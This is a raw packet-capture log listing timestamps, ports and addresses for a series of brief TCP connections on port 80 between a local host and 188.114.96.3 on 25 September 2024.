Sep 25, 2024 15:29:05.575196028 CEST	80	55906	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:05.575257063 CEST	55906	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:05.579761982 CEST	80	55906	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:05.710910082 CEST	55907	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:05.715948105 CEST	80	55907	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:05.716069937 CEST	55907	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:05.718041897 CEST	55907	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:05.723005056 CEST	80	55907	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:05.723093033 CEST	55907	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:05.728027105 CEST	80	55907	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:06.426374912 CEST	80	55907	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:06.426526070 CEST	55907	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:06.427726984 CEST	80	55907	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:06.427792072 CEST	55907	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:06.431327105 CEST	80	55907	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:06.575077057 CEST	55908	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:06.580080032 CEST	80	55908	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:06.580159903 CEST	55908	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:06.582248926 CEST	55908	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:06.587903023 CEST	80	55908	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:06.587970972 CEST	55908	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:06.593162060 CEST	80	55908	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:07.270327091 CEST	80	55908	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:07.270519972 CEST	55908	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:07.271265984 CEST	80	55908	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:07.271318913 CEST	55908	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:07.275362015 CEST	80	55908	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:07.436861038 CEST	55909	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:07.442087889 CEST	80	55909	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:07.442178965 CEST	55909	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:07.444246054 CEST	55909	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:07.449915886 CEST	80	55909	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:07.449996948 CEST	55909	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:07.455071926 CEST	80	55909	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:08.155661106 CEST	80	55909	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:08.155724049 CEST	80	55909	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:08.155785084 CEST	55909	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:08.156112909 CEST	55909	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:08.160820007 CEST	80	55909	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:08.307549000 CEST	55910	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:08.312556028 CEST	80	55910	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:08.312642097 CEST	55910	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:08.314676046 CEST	55910	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:08.319519043 CEST	80	55910	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:08.319577932 CEST	55910	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:08.324451923 CEST	80	55910	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:09.003256083 CEST	80	55910	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:09.003544092 CEST	55910	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:09.004868984 CEST	80	55910	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:09.004928112 CEST	55910	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:09.008486032 CEST	80	55910	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:09.165110111 CEST	55911	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:09.172074080 CEST	80	55911	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:09.172163963 CEST	55911	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:09.174232006 CEST	55911	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:09.180985928 CEST	80	55911	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:09.181025982 CEST	55911	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:09.186547995 CEST	80	55911	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:09.872705936 CEST	80	55911	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:09.872961044 CEST	55911	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:09.873544931 CEST	80	55911	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:09.873595953 CEST	55911	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:09.877821922 CEST	80	55911	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:10.027779102 CEST	55912	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:10.032752991 CEST	80	55912	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:10.032818079 CEST	55912	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:10.034786940 CEST	55912	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:10.039563894 CEST	80	55912	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:10.039622068 CEST	55912	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:10.044404030 CEST	80	55912	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:10.728037119 CEST	80	55912	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:10.728142023 CEST	55912	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:10.728497982 CEST	80	55912	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:10.728549004 CEST	55912	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:10.733141899 CEST	80	55912	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:10.879240036 CEST	55913	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:10.884290934 CEST	80	55913	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:10.884505033 CEST	55913	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:10.887372971 CEST	55913	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:10.892343998 CEST	80	55913	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:10.892410040 CEST	55913	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:10.897280931 CEST	80	55913	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:11.581698895 CEST	80	55913	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:11.581835985 CEST	55913	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:11.582000017 CEST	80	55913	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:11.582057953 CEST	55913	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:11.588289976 CEST	80	55913	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:11.738733053 CEST	55914	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:11.745556116 CEST	80	55914	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:11.745649099 CEST	55914	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:11.748871088 CEST	55914	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:11.755378962 CEST	80	55914	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:11.755446911 CEST	55914	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:11.760690928 CEST	80	55914	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:12.445864916 CEST	80	55914	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:12.445970058 CEST	55914	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:12.446190119 CEST	80	55914	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:12.446244001 CEST	55914	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:12.450993061 CEST	80	55914	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:12.595010042 CEST	55915	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:12.600791931 CEST	80	55915	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:12.600989103 CEST	55915	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:12.603019953 CEST	55915	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:12.607968092 CEST	80	55915	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:12.608011007 CEST	55915	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:12.613403082 CEST	80	55915	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:13.328320026 CEST	80	55915	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:13.328556061 CEST	55915	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:13.328747988 CEST	80	55915	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:13.328804970 CEST	55915	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:13.333492041 CEST	80	55915	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:13.474045992 CEST	55916	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:13.479160070 CEST	80	55916	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:13.479233980 CEST	55916	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:13.482163906 CEST	55916	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:13.486959934 CEST	80	55916	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:13.487014055 CEST	55916	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:13.491878033 CEST	80	55916	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:14.283534050 CEST	80	55916	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:14.284487963 CEST	80	55916	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:14.284533024 CEST	55916	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:14.284533024 CEST	55916	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:14.289431095 CEST	80	55916	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:14.445102930 CEST	55917	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:14.450103998 CEST	80	55917	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:14.450185061 CEST	55917	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:14.452272892 CEST	55917	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:14.457300901 CEST	80	55917	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:14.457361937 CEST	55917	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:14.462142944 CEST	80	55917	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:15.163403988 CEST	80	55917	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:15.163542986 CEST	55917	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:15.163990974 CEST	80	55917	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:15.164052963 CEST	55917	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:15.172020912 CEST	80	55917	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:15.331796885 CEST	55918	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:15.337119102 CEST	80	55918	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:15.337220907 CEST	55918	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:15.339183092 CEST	55918	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:15.345597029 CEST	80	55918	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:15.345683098 CEST	55918	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:15.351655960 CEST	80	55918	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:16.082158089 CEST	80	55918	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:16.082397938 CEST	55918	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:16.082948923 CEST	80	55918	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:16.083049059 CEST	55918	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:16.087444067 CEST	80	55918	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:16.239569902 CEST	55919	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:16.349798918 CEST	80	55919	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:16.349877119 CEST	55919	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:16.352869034 CEST	55919	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:16.357738972 CEST	80	55919	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:16.357806921 CEST	55919	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:16.362776041 CEST	80	55919	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:17.069355011 CEST	80	55919	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:17.069654942 CEST	55919	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:17.069735050 CEST	80	55919	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:17.069791079 CEST	55919	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:17.074546099 CEST	80	55919	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:17.217329979 CEST	55920	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:17.222316027 CEST	80	55920	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:17.222383976 CEST	55920	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:17.224992037 CEST	55920	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:17.230257988 CEST	80	55920	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:17.230321884 CEST	55920	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:17.235146999 CEST	80	55920	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:17.926692009 CEST	80	55920	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:17.927203894 CEST	55920	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:17.927969933 CEST	80	55920	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:17.928041935 CEST	55920	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:17.932138920 CEST	80	55920	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:18.096944094 CEST	55921	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:18.102425098 CEST	80	55921	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:18.102580070 CEST	55921	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:18.106753111 CEST	55921	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:18.111581087 CEST	80	55921	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:18.111648083 CEST	55921	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:18.116441011 CEST	80	55921	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:18.781105042 CEST	80	55921	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:18.781203985 CEST	55921	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:18.783730030 CEST	80	55921	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:18.783782005 CEST	55921	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:18.786815882 CEST	80	55921	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:18.935683012 CEST	55922	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:18.940635920 CEST	80	55922	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:18.940733910 CEST	55922	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:18.943695068 CEST	55922	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:18.948530912 CEST	80	55922	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:18.948582888 CEST	55922	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:18.953350067 CEST	80	55922	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:19.609523058 CEST	80	55922	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:19.609687090 CEST	55922	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:19.610387087 CEST	80	55922	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:19.610439062 CEST	55922	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:19.614844084 CEST	80	55922	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:19.772528887 CEST	55923	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:19.777781010 CEST	80	55923	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:19.777894974 CEST	55923	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:19.780791998 CEST	55923	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:19.785748959 CEST	80	55923	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:19.785847902 CEST	55923	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:19.790704966 CEST	80	55923	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:20.495378971 CEST	80	55923	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:20.495549917 CEST	55923	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:20.497245073 CEST	80	55923	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:20.497313023 CEST	55923	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:20.501106977 CEST	80	55923	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:20.643821955 CEST	55924	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:20.649606943 CEST	80	55924	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:20.649749994 CEST	55924	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:20.652770996 CEST	55924	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:20.657798052 CEST	80	55924	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:20.658124924 CEST	55924	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:20.663149118 CEST	80	55924	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:21.686429024 CEST	80	55924	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:21.686655045 CEST	55924	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:21.687200069 CEST	80	55924	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:21.687272072 CEST	55924	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:21.691492081 CEST	80	55924	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:21.858822107 CEST	55925	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:21.868463039 CEST	80	55925	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:21.868571997 CEST	55925	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:21.871562958 CEST	55925	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:21.877248049 CEST	80	55925	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:21.877332926 CEST	55925	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:21.883229971 CEST	80	55925	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:22.673975945 CEST	80	55925	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:22.674103975 CEST	55925	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:22.674951077 CEST	80	55925	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:22.675004005 CEST	55925	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:22.680604935 CEST	80	55925	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:22.952887058 CEST	55926	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:22.957988024 CEST	80	55926	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:22.958095074 CEST	55926	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:22.961080074 CEST	55926	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:22.966309071 CEST	80	55926	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:22.966391087 CEST	55926	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:22.972016096 CEST	80	55926	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:23.753916025 CEST	80	55926	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:23.754090071 CEST	55926	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:23.754235983 CEST	80	55926	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:23.754285097 CEST	55926	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:23.758949041 CEST	80	55926	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:23.916517973 CEST	55927	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:23.921403885 CEST	80	55927	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:23.921478987 CEST	55927	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:23.923665047 CEST	55927	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:23.928447008 CEST	80	55927	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:23.928498030 CEST	55927	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:23.933298111 CEST	80	55927	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:24.755846024 CEST	80	55927	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:24.756017923 CEST	55927	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:24.756756067 CEST	80	55927	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:24.756819963 CEST	55927	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:24.760804892 CEST	80	55927	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:24.907974958 CEST	55928	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:24.914019108 CEST	80	55928	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:24.914108038 CEST	55928	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:24.916723967 CEST	55928	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:24.921525002 CEST	80	55928	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:24.921644926 CEST	55928	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:24.928392887 CEST	80	55928	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:26.878097057 CEST	80	55928	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:26.878402948 CEST	55928	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:26.879067898 CEST	80	55928	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:26.879133940 CEST	55928	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:26.883420944 CEST	80	55928	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:27.042970896 CEST	55929	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:27.048403025 CEST	80	55929	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:27.048496962 CEST	55929	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:27.050617933 CEST	55929	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:27.055624008 CEST	80	55929	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:27.055675030 CEST	55929	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:27.060877085 CEST	80	55929	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:27.707496881 CEST	80	55929	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:27.707906008 CEST	80	55929	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:27.710721970 CEST	55929	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:27.710783005 CEST	55929	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:27.715578079 CEST	80	55929	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:27.856446981 CEST	55931	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:27.861912012 CEST	80	55931	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:27.861988068 CEST	55931	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:27.864459991 CEST	55931	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:27.870177031 CEST	80	55931	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:27.870220900 CEST	55931	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:27.875838041 CEST	80	55931	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:28.622564077 CEST	80	55931	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:28.623064041 CEST	80	55931	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:28.623111010 CEST	55931	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:28.625323057 CEST	55931	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:28.631310940 CEST	80	55931	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:28.929188013 CEST	55932	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:28.934226990 CEST	80	55932	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:28.934324980 CEST	55932	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:28.937855959 CEST	55932	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:28.942717075 CEST	80	55932	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:28.942773104 CEST	55932	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:28.947808027 CEST	80	55932	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:29.615843058 CEST	80	55932	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:29.616024017 CEST	55932	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:29.617259026 CEST	80	55932	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:29.617316008 CEST	55932	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:29.620789051 CEST	80	55932	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:29.764981985 CEST	55933	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:29.769980907 CEST	80	55933	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:29.770091057 CEST	55933	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:29.772151947 CEST	55933	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:29.777162075 CEST	80	55933	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:29.777252913 CEST	55933	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:29.782213926 CEST	80	55933	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:30.430428028 CEST	80	55933	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:30.431019068 CEST	80	55933	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:30.431091070 CEST	55933	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:30.431145906 CEST	55933	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:30.436181068 CEST	80	55933	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:30.573311090 CEST	55934	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:30.578171015 CEST	80	55934	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:30.579696894 CEST	55934	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:30.582592964 CEST	55934	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:30.587399960 CEST	80	55934	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:30.591674089 CEST	55934	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:30.596493959 CEST	80	55934	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:31.557198048 CEST	80	55934	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:31.557224989 CEST	80	55934	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:31.557239056 CEST	80	55934	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:31.557337046 CEST	55934	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:31.557367086 CEST	55934	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:31.559910059 CEST	80	55934	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:31.560025930 CEST	55934	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:31.573163033 CEST	55934	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:31.579554081 CEST	80	55934	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:31.886042118 CEST	55935	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:31.892743111 CEST	80	55935	188.114.96.3	192.168.2.4
